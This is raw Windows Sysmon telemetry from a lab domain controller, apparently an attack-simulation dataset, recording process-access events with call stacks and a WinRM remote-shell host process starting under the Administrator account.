08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.151{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.134{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.055{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.055{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.055{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.055{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.055{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.978{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1502-5F84-0700-000000007E01}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-1503-000000007E01}4028C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 